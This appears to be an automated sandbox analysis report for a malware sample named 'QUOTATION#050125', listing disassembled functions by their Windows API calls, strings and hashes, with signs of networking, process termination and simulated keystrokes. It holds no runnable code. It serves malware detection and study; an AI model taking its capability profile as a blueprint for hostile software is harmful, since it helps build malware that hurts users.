                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                      • String ID:
                                                                                      • API String ID: 3113390036-3916222277
                                                                                      • Opcode ID: f79b2d60727768b4f87db2701d24218ccc4097968cbfe0bd547a4f1f18c1a9c9
                                                                                      • Instruction ID: 846196c0a4b16945b09b7f847e2c5e67bb288682ba752bb066b08fb4231971ea
                                                                                      • Opcode Fuzzy Hash: f79b2d60727768b4f87db2701d24218ccc4097968cbfe0bd547a4f1f18c1a9c9
                                                                                      • Instruction Fuzzy Hash: 273167B1600708AFD7219FA4DC88AAB7BFCFB59744F14851EF486A6600DB30ED459BA1
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00103AAF,?,?,Bad directive syntax error,0015CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 001298BC
                                                                                      • LoadStringW.USER32(00000000,?,00103AAF,?), ref: 001298C3
                                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00129987
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleLoadMessageModuleString
                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                      • API String ID: 2734547477-4153970271
APIs
• GetParent.USER32 ref: 001220AB
• GetClassNameW.USER32(00000000,?,00000100), ref: 001220C0
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0012214D
Similarity
• API ID: ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1290815626-3381328864
APIs
• SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00155186
• ShowWindow.USER32(?,00000000), ref: 001551C7
• ShowWindow.USER32(?,00000005,?,00000000), ref: 001551CD
• SetFocus.USER32(?,?,00000005,?,00000000), ref: 001551D1
  • Part of subcall function 00156FBA: DeleteObject.GDI32(00000000), ref: 00156FE6
• GetWindowLongW.USER32(?,000000F0), ref: 0015520D
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 0015521A
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0015524D
• SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00155287
• SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00155296
Similarity
• API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
• String ID:
• API String ID: 3210457359-0
APIs
• LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00116890
• ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 001168A9
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001168B9
• ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 001168D1
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001168F2
• DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,000D8874,00000000,00000000,00000000,000000FF,00000000), ref: 00116901
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0011691E
• DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,000D8874,00000000,00000000,00000000,000000FF,00000000), ref: 0011692D
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend
• String ID:
• API String ID: 1268354404-0
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0013C182
• GetLastError.KERNEL32 ref: 0013C195
• SetEvent.KERNEL32(?), ref: 0013C1A9
  • Part of subcall function 0013C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0013C272
  • Part of subcall function 0013C253: GetLastError.KERNEL32 ref: 0013C322
  • Part of subcall function 0013C253: SetEvent.KERNEL32(?), ref: 0013C336
  • Part of subcall function 0013C253: InternetCloseHandle.WININET(00000000), ref: 0013C341
Similarity
• API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
• String ID:
• API String ID: 337547030-0
APIs
  • Part of subcall function 00123A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00123A57
  • Part of subcall function 00123A3D: GetCurrentThreadId.KERNEL32 ref: 00123A5E
  • Part of subcall function 00123A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001225B3), ref: 00123A65
• MapVirtualKeyW.USER32(00000025,00000000), ref: 001225BD
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001225DB
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 001225DF
• MapVirtualKeyW.USER32(00000025,00000000), ref: 001225E9
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00122601
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00122605
• MapVirtualKeyW.USER32(00000025,00000000), ref: 0012260F
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00122623
• Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00122627
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00121449,?,?,00000000), ref: 0012180C
• HeapAlloc.KERNEL32(00000000,?,00121449,?,?,00000000), ref: 00121813
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00121449,?,?,00000000), ref: 00121828
• GetCurrentProcess.KERNEL32(?,00000000,?,00121449,?,?,00000000), ref: 00121830
• DuplicateHandle.KERNEL32(00000000,?,00121449,?,?,00000000), ref: 00121833
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00121449,?,?,00000000), ref: 00121843
• GetCurrentProcess.KERNEL32(00121449,00000000,?,00121449,?,?,00000000), ref: 0012184B
• DuplicateHandle.KERNEL32(00000000,?,00121449,?,?,00000000), ref: 0012184E
• CreateThread.KERNEL32(00000000,00000000,00121874,00000000,00000000,00000000), ref: 00121868
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
APIs
  • Part of subcall function 0012D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0012D501
  • Part of subcall function 0012D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0012D50F
  • Part of subcall function 0012D4DC: CloseHandle.KERNEL32(00000000), ref: 0012D5DC
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0014A16D
• GetLastError.KERNEL32 ref: 0014A180
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0014A1B3
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0014A268
• GetLastError.KERNEL32(00000000), ref: 0014A273
• CloseHandle.KERNEL32(00000000), ref: 0014A2C4
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
APIs
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0012BCFD
• IsMenu.USER32(00000000), ref: 0012BD1D
• CreatePopupMenu.USER32 ref: 0012BD53
• GetMenuItemCount.USER32(00A898B8), ref: 0012BDA4
• InsertMenuItemW.USER32(00A898B8,?,00000001,00000030), ref: 0012BDCC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                      • String ID: 0$2
                                                                                      • API String ID: 93392585-3793063076
                                                                                      • Opcode ID: 5d756c6dc87960146e066497a85d9ef1b239bf75c9ecfb182502c871ed741ec9
                                                                                      • Instruction ID: 358162839800437becc528399c11af99555505faf420b107be65c636df597a3c
                                                                                      • Opcode Fuzzy Hash: 5d756c6dc87960146e066497a85d9ef1b239bf75c9ecfb182502c871ed741ec9
                                                                                      • Instruction Fuzzy Hash: 6751BE70A08329DBDB14CFE8E8C4BEEBBF4AF55318F148119E4519B291E7709961CB91
                                                                                      APIs
                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 0012C913
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconLoad
                                                                                      • String ID: blank$info$question$stop$warning
                                                                                      • API String ID: 2457776203-404129466
                                                                                      • Opcode ID: 8538c6b751da78a53ab26b6986da8a43e8126dd480e837a77e403de60b234f5b
                                                                                      • Instruction ID: 778f995ddd844a5860f66f27ba50125c1bda71767bbf062825a6b27a47645c7d
                                                                                      • Opcode Fuzzy Hash: 8538c6b751da78a53ab26b6986da8a43e8126dd480e837a77e403de60b234f5b
                                                                                      • Instruction Fuzzy Hash: C2112B31689316BEEB046B54EC83CEE379CDF15328B10003EF700A6182E7E05E5057E9
                                                                                      APIs
                                                                                        • Part of subcall function 000D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000D9BB2
                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00159FC7
                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00159FE7
                                                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0015A224
                                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0015A242
                                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0015A263
                                                                                      • ShowWindow.USER32(00000003,00000000), ref: 0015A282
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0015A2A7
                                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 0015A2CA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                      • String ID:
                                                                                      • API String ID: 1211466189-0
                                                                                      • Opcode ID: 8993da2a4a8f90d757042bf1ae5c32c575604b73d5b086cb06960c1ed53ad50b
                                                                                      • Instruction ID: 637c69a3dfb25ca08ca48080eb6e50d06af7ce28b39e136525cd768b43203a01
                                                                                      • Opcode Fuzzy Hash: 8993da2a4a8f90d757042bf1ae5c32c575604b73d5b086cb06960c1ed53ad50b
                                                                                      • Instruction Fuzzy Hash: 15B1B931640219EFCF14CF68C9C57AA3BB2BF48702F488169ECA59F295D731A984CB51
                                                                                      APIs
                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0011682C,00000004,00000000,00000000), ref: 000DF953
                                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0011682C,00000004,00000000,00000000), ref: 0011F3D1
                                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0011682C,00000004,00000000,00000000), ref: 0011F454
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ShowWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1268545403-0
                                                                                      • Opcode ID: b799a95c609f48f6772fb42368679f9a777a42b9a793b1cff0db28c97ff0908f
                                                                                      • Instruction ID: 93c2a7e17507d82b741b8280daab1e168e4b731a529cda5cafac9e8a7e8d58e1
                                                                                      • Opcode Fuzzy Hash: b799a95c609f48f6772fb42368679f9a777a42b9a793b1cff0db28c97ff0908f
                                                                                      • Instruction Fuzzy Hash: BB410830A18782BEC7799F2988A877ABAD2BB56314F14C03EE05796B61D73198C1C771
                                                                                      APIs
                                                                                      • DeleteObject.GDI32(00000000), ref: 00152D1B
                                                                                      • GetDC.USER32(00000000), ref: 00152D23
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00152D2E
                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00152D3A
                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00152D76
                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00152D87
                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00155A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00152DC2
                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00152DE1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3864802216-0
                                                                                      • Opcode ID: 5f648900b2d9542f8eb0846feadb6ffa097d7874e65c8ac19d021933f44189f2
                                                                                      • Instruction ID: 13a4eb7a97b2d39ffd6d2766b3332759e6cca400fe7f9219a6cc118c5c7b05bc
                                                                                      • Opcode Fuzzy Hash: 5f648900b2d9542f8eb0846feadb6ffa097d7874e65c8ac19d021933f44189f2
                                                                                      • Instruction Fuzzy Hash: BA316B76201314BFEB118F50DC8AFEB3BA9EB0A716F044055FE089E291C6759C90CBA4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                      • API String ID: 0-572801152
                                                                                      • Opcode ID: da742ad1442b8089a4c472cca2722d6346b3e71ff685ea2e53ac99a4f2a75326
                                                                                      • Instruction ID: 161d618f11385ace130256a57af93d08e949ca7e86c034dfb39ef538a4240264
                                                                                      • Opcode Fuzzy Hash: da742ad1442b8089a4c472cca2722d6346b3e71ff685ea2e53ac99a4f2a75326
                                                                                      • Instruction Fuzzy Hash: 7CD1B175A0060AAFDF14CFA8C881FAEB7B6BF48344F148169F915AB292D770DD45CB90
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit
                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                      • API String ID: 2610073882-625585964
                                                                                      • Opcode ID: 3f382e0d12a9b87dfd61663f5cd0d3d82f5034f0f664c5e957c01bb596041c31
                                                                                      • Instruction ID: ec64ac9a27f8e10f4ca013c4686039c73c99d06a22362a9447157b3e7a5b21ed
                                                                                      • Opcode Fuzzy Hash: 3f382e0d12a9b87dfd61663f5cd0d3d82f5034f0f664c5e957c01bb596041c31
                                                                                      • Instruction Fuzzy Hash: 9C91AC71A00219EFDF24CFA4C888FAEBBB8EF46715F108559F515AB291D7709942CFA0
                                                                                      APIs
                                                                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0013125C
                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00131284
                                                                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 001312A8
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001312D8
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0013135F
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001313C4
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00131430
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                      • String ID:
                                                                                      • API String ID: 2550207440-0
                                                                                      • Opcode ID: 14a43b911742060f004119efc2b5f71a59fac6f946cf223c4cbfade05f84d617
                                                                                      • Instruction ID: 6a86d7165b7cd48fc157f423cb8ae9082e80987363798c1e62f61fbfdbe9b6fc
                                                                                      • Opcode Fuzzy Hash: 14a43b911742060f004119efc2b5f71a59fac6f946cf223c4cbfade05f84d617
                                                                                      • Instruction Fuzzy Hash: 8991F472A00309AFEB00DFA4C894BFEB7B5FF44325F214029E911EB292D774A941CB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                      • String ID:
                                                                                      • API String ID: 3225163088-0
                                                                                      • Opcode ID: 58c9497992c06d74d0e1b9618d40dd3a3376b85374c1c8acdd62b8e597798724
                                                                                      • Instruction ID: a0a61dfe4b63d4b5cff9ce9aed77343e10b9d2119dc72a63d0b34f243fd8ffac
                                                                                      • Opcode Fuzzy Hash: 58c9497992c06d74d0e1b9618d40dd3a3376b85374c1c8acdd62b8e597798724
                                                                                      • Instruction Fuzzy Hash: A9911571900219EFCB15CFA9C884AEEBBB8FF49320F144556E515B7295D374AA82CBA0
                                                                                      APIs
                                                                                      • IsWindow.USER32(00A89908), ref: 00157F37
                                                                                      • IsWindowEnabled.USER32(00A89908), ref: 00157F43
                                                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0015801E
                                                                                      • SendMessageW.USER32(00A89908,000000B0,?,?), ref: 00158051
                                                                                      • IsDlgButtonChecked.USER32(?,?), ref: 00158089
                                                                                      • GetWindowLongW.USER32(00A89908,000000EC), ref: 001580AB
                                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 001580C3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                      • String ID:
                                                                                      • API String ID: 4072528602-0
                                                                                      APIs
                                                                                      • GetParent.USER32(?), ref: 0012AEF9
                                                                                      • GetKeyboardState.USER32(?), ref: 0012AF0E
                                                                                      • SetKeyboardState.USER32(?), ref: 0012AF6F
                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 0012AF9D
                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0012AFBC
                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 0012AFFD
                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0012B020
                                                                                      Similarity
                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                      • String ID:
                                                                                      • API String ID: 87235514-0
                                                                                      APIs
                                                                                      • GetParent.USER32(00000000), ref: 0012AD19
                                                                                      • GetKeyboardState.USER32(?), ref: 0012AD2E
                                                                                      • SetKeyboardState.USER32(?), ref: 0012AD8F
                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0012ADBB
                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0012ADD8
                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0012AE17
                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0012AE38
                                                                                      Similarity
                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                      • String ID:
                                                                                      • API String ID: 87235514-0
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00153925
                                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0015393A
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00153954
                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 001539C6
                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 001539F4
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window
                                                                                      • String ID: SysListView32
                                                                                      • API String ID: 2326795674-78025650
                                                                                      APIs
                                                                                        • Part of subcall function 0014304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0014307A
                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00141112
                                                                                      • WSAGetLastError.WSOCK32 ref: 00141121
                                                                                      • WSAGetLastError.WSOCK32 ref: 001411C9
                                                                                      • closesocket.WSOCK32(00000000), ref: 001411F9
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$closesocketinet_addrsocket
                                                                                      • String ID:
                                                                                      • API String ID: 3854663608-0
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00152E1C
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00152E4F
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00152E84
                                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00152EB6
                                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00152EE0
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00152EF1
                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00152F0B
                                                                                      Similarity
                                                                                      • API ID: LongWindow$MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 2178440468-0
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00127769
